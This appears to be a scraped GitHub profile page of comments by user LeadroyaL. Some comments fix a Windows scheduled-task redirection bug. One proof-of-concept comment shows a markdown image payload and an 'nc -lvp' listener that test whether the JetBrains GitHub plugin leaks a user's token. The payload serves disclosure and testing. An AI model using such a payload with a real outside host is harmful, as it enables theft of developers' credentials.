LeadroyaL

icon indicating a website link https://www.leadroyal.cn

icon company ZJU icon location ZJU icon location Android & Pwn.

Results 14 comments of LeadroyaL

修复windows下定时任务重定向失败的BUG

> 第4行 去掉 `>>` 第10改成 `/TR "%RUNCMD% >> %LOGFILE%"` 是否可行 > > 这样不用再依赖另一个bat文件 这样是不行的,问题在于 /TR 后面的命令, "%RUNCMD% >> %LOGFILE%" 这个管道符不是作为管道符存在,而是作为 %RUNCMD% 的第1个入参存在,必须依赖另一个bat

修复windows下定时任务重定向失败的BUG

@NewFuture

poc and exp

payload: ![](http://127.0.0.1:12345/1.jpg) ↑↑↑ `payload: ![](http://127.0.0.1:12345/1.jpg)` When load this PR with Jetbrains Github Plugin, if 127.0.0.1:12345 receive token, your IDE is vulnerable. Else, your IDE is safe.

poc and exp

Payload **without actual damage**. write anything like the following in any PR comment ``` payload: ![](http://127.0.0.1:12345/1.jpg) ``` ``` command: nc -lvp 12345 ``` result: ``` $ nc -lvp 12345 Listening...